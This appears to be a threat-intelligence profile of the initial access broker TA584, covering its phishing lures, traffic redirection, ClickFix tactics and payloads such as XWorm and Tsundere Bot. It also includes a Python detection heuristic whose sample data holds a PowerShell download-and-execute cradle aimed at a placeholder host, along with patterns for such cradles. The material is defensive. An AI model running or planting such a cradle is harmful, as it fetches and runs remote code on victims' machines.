TA584
TA584 is a prolific cybercriminal initial access broker tracked by Proofpoint since 2020 and assessed to overlap with Microsoft’s Storm-0900 cluster. The actor conducts high-volume, email-centric phishing campaigns to obtain initial access that can enable follow-on ransomware and data theft. Proofpoint describes TA584 as one of its most prominent cybercriminal threat actors.
TA584 targets organizations globally and historically focused on North America, the UK, and Ireland, later expanding targeting to Germany, other European countries, and Australia. The actor is described as opportunistic rather than sector-specific, but frequently impersonates healthcare organizations and government entities, as well as recruiting firms, business services, and well-known brands. Reported lure themes include parking tickets, medical test results, tax obligations, payments, business complaints, and other urgent notifications.
Observed tradecraft includes phishing emails sent from compromised aged accounts and sometimes via SendGrid or Amazon SES; per-target unique URLs; geofencing and IP filtering; redirect chains using traffic direction systems including 404 TDS, Keitaro, and historically Cookie Reloaded/Prometheus TDS; CAPTCHA-gated landing pages; and, from late July 2025, ClickFix social engineering that instructs victims to copy, paste, and run PowerShell commands. Proofpoint reported TA584 campaigns often last only hours to days and rapidly rotate lures, infrastructure, and delivery methods.
TA584 has delivered multiple payloads over time, including Ursnif, LDR4, WarmCookie, Xeno RAT, Cobalt Strike, DCRAT, XWorm, and Tsundere Bot. In 2025, Proofpoint reported XWorm with configuration "P0WER" as the primary payload and observed TA584 distributing Tsundere Bot from late November 2025. TA584 has been observed using Tsundere Bot alongside the XWorm remote access trojan to gain network access that could lead to ransomware attacks.
The Tsundere Bot activity associated with TA584 used PowerShell-based execution chains that loaded malware into memory. Reporting describes Tsundere Bot as a malware-as-a-service backdoor/loader that gathers system information, can execute arbitrary code, requires Node.js, retrieves command-and-control information from the Ethereum blockchain using an EtherHiding-like technique, and communicates over WebSockets. Tsundere Bot also checks system locale and exits on CIS-language systems. Proofpoint assessed with high confidence that TA584 infections can lead to ransomware and stated TA584 is likely connected to the Russian cybercriminal ecosystem. Known aliases: Storm-0900.
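As an added illustration (not code from Proofpoint, Mallory, or the original profile), the following Python heuristic scores process-creation events for the paste-and-run PowerShell pattern and the Node.js follow-on described above. The telemetry field names (parent, image, cmdline) and the sample events are constructed assumptions modelled on typical Sysmon/EDR data, not real telemetry or indicators.

```python
import re

# Assumed telemetry fields (mirroring Sysmon/EDR process-creation events): parent, image, cmdline
USER_PASTE_PARENTS = {"explorer.exe"}            # Win+R dialog / File Explorer address bar
POWERSHELL = {"powershell.exe", "pwsh.exe"}

# Traits of a paste-and-run cradle that fetches a payload and stages it in memory
CRADLE_PATTERNS = [
    r"-(?:e|en|enc|encodedcommand)\b",                     # encoded command
    r"-w(?:indowstyle)?\s+hidden",                         # hidden window
    r"-nop\b|-noprofile\b",                                # skip profile
    r"\biex\b|invoke-expression",                          # in-memory execution
    r"\biwr\b|\birm\b|invoke-webrequest|downloadstring",   # remote fetch
]

def score_event(ev):
    """Return (score, reasons) for one process-creation event."""
    image, parent, cmd = ev["image"].lower(), ev["parent"].lower(), ev["cmdline"].lower()
    reasons = []
    if image in POWERSHELL:
        if parent in USER_PASTE_PARENTS:
            reasons.append("powershell launched directly from the user shell (paste-and-run)")
        reasons += [f"cradle trait: {p}" for p in CRADLE_PATTERNS if re.search(p, cmd)]
    elif image == "node.exe":
        # Tsundere Bot requires Node.js; node spawned by PowerShell from a user-writable path is suspicious
        if parent in POWERSHELL:
            reasons.append("node.exe spawned by powershell")
        if re.search(r"\\users\\[^\\]+\\(?:appdata|downloads|temp)\\", cmd):
            reasons.append("node.exe running a script from a user-writable path")
    return len(reasons), reasons

def detect(events, threshold=2):
    """Return (event, reasons) pairs whose score meets the threshold."""
    scored = ((ev, score_event(ev)) for ev in events)
    return [(ev, reasons) for ev, (score, reasons) in scored if score >= threshold]

# Constructed sample events, not real telemetry or indicators
SAMPLE_EVENTS = [
    {"parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": 'powershell -w hidden -nop -c "iex (iwr http://example.invalid/verify)"'},
    {"parent": "cmd.exe", "image": "powershell.exe",
     "cmdline": "powershell -File C:\\Scripts\\nightly-backup.ps1"},
    {"parent": "powershell.exe", "image": "node.exe",
     "cmdline": "node.exe C:\\Users\\alice\\AppData\\Roaming\\svc\\index.js"},
]

if __name__ == "__main__":
    for ev, reasons in detect(SAMPLE_EVENTS):
        print(ev["image"], "<-", ev["parent"], "|", "; ".join(reasons))
```

The threshold keeps a lone benign PowerShell script launch below the alert line while the explorer-spawned cradle and the PowerShell-spawned node.exe both surface.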
Targeting
Who, where, and (when attributed) which flag flies behind the operation. Pulled from open-source reporting and Mallory's analyst review.
Who they target
Sectors the actor has been observed targeting.
- Health Care Equipment & Services
- Government & Administration
Where they target
Geographies tied to known operations.
- 🇺🇸 United States
Tradecraft
30 distinct techniques observed across reporting, grouped by tactic.
Associated malware families
10 malware families attributed to this actor across reporting.
5 additional families tracked in Mallory.
Recent activity
15 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
Initial access broker activity using phishing/social engineering (ClickFix) and traffic redirection (TDS) to deliver RATs and enable follow-on ransomware; targets primarily North America and parts of Europe.
Criminal actor evolving initial access via high-variation, brand-impersonation social engineering campaigns with consistent underlying objective (drive engagement with malicious content).
Cybercriminal initial access broker conducting high-volume, email-led intrusion chains. In 2025 it rapidly rotated lures/infrastructure/payloads, shifted to ClickFix social engineering, and delivered commodity RAT/backdoor payloads that can enable follow-on ransomware and data theft.
Initial access broker activity; 2025 campaigns noted to have shifted to ClickFix delivery and introduced a new malware strain (Tsundere Bot).